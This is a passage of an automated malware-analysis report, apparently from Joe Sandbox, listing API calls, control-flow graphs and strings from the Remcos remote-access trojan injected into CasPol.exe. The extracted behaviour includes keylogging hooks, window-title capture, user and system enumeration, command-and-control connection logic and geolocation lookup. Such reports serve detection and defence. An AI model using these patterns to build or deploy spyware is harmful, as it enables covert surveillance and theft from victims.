• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1259 4099e4-4099fd 1260 409a63-409a73 GetMessageA 1259->1260 1261 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1259->1261 1262 409a75-409a8d TranslateMessage DispatchMessageA 1260->1262 1263 409a8f 1260->1263 1261->1260 1264 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1261->1264 1262->1260 1262->1263 1265 409a91-409a96 1263->1265 1264->1265
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
• Keylogger initialization failure: error , xrefs: 00409A32
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
• Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
• Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
• Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                            Control-flow Graph

APIs
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• Sleep.KERNEL32(00000BB8), ref: 0040E603
• ExitProcess.KERNEL32 ref: 0040E672
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.3.0 Pro$override$pth_unenc$BG
• API String ID: 2281282204-3981147832
• Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
• Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
• Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

Control-flow Graph
APIs
• GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
• CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040495C
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
• Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
• Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
• Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
• Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
• GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
• Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
• Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
• Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Control-flow Graph
APIs
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
• API String ID: 2830904901-3665108517
• Opcode ID: bbeaf468ebe3372ece6b74a3a03c9e0c86b481aff26255fbfff681fcf774babf
• Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
• Opcode Fuzzy Hash: bbeaf468ebe3372ece6b74a3a03c9e0c86b481aff26255fbfff681fcf774babf
• Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Control-flow Graph
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                            • API String ID: 524882891-2450167416
                                                                                                            • Opcode ID: c3a12b7739178762d846dab4c35ba272d4dc73e948148dcf03e39571e7f482de
                                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                            • Opcode Fuzzy Hash: c3a12b7739178762d846dab4c35ba272d4dc73e948148dcf03e39571e7f482de
                                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                            • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                            • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1035 404439-40443e 1032->1035 1036 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1036 1038 404443-40445c call 401f66 * 2 call 41a686 1035->1038 1036->1028 1038->1028 1056 404315-404338 call 401f66 * 2 call 41a686 1041->1056 1057 40434c-404357 call 420f34 1041->1057 1042->1038 1085 40433b-404347 call 420191 1056->1085 1068 404389-404396 call 4202ea 1057->1068 1069 404359-404387 call 401f66 * 2 call 41a686 call 420592 1057->1069 1079 404398-4043bb call 401f66 * 2 call 41a686 1068->1079 1080 4043be-4043d7 CreateEventW * 2 1068->1080 1069->1085 1079->1080 1080->1025 1085->1028
                                                                                                            APIs
                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                            • API String ID: 994465650-2151626615
                                                                                                            • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                            • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                                            • API String ID: 911427763-3954389425
                                                                                                            • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                            • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1177 40c89e-40c8c3 call 401e52 1180 40c8c9 1177->1180 1181 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1177->1181 1182 40c8d0-40c8d5 1180->1182 1183 40c9c2-40c9c7 1180->1183 1184 40c905-40c90a 1180->1184 1185 40c9d8 1180->1185 1186 40c9c9-40c9ce call 43ac0f 1180->1186 1187 40c8da-40c8e8 call 41a74b call 401e18 1180->1187 1188 40c8fb-40c900 1180->1188 1189 40c9bb-40c9c0 1180->1189 1190 40c90f-40c916 call 41b15b 1180->1190 1207 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1181->1207 1192 40c9dd-40c9e2 call 43ac0f 1182->1192 1183->1192 1184->1192 1185->1192 1198 40c9d3-40c9d6 1186->1198 1210 40c8ed 1187->1210 1188->1192 1189->1192 1202 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1202 1203 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1190->1203 1204 40c9e3-40c9e8 call 4082d7 1192->1204 1198->1185 1198->1204 1216 40c8f1-40c8f6 call 401e13 1202->1216 1203->1210 1204->1181 1210->1216 1216->1181
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath
                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                            • API String ID: 82841172-425784914
                                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1323 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1328 41a55c-41a57d InternetReadFile 1323->1328 1329 41a5a3-41a5a6 1328->1329 1330 41a57f-41a59f call 401f86 call 402f08 call 401eea 1328->1330 1331 41a5a8-41a5aa 1329->1331 1332 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1329->1332 1330->1329 1331->1328 1331->1332 1337 41a5be-41a5c8 1332->1337
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                            Strings
                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                            • API String ID: 3121278467-91888290
                                                                                                            • Opcode ID: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                            • Opcode Fuzzy Hash: 36e01e55f813b3e587d73a157094a3d7c5a29764a6c694396ca7ce848afa256e
                                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
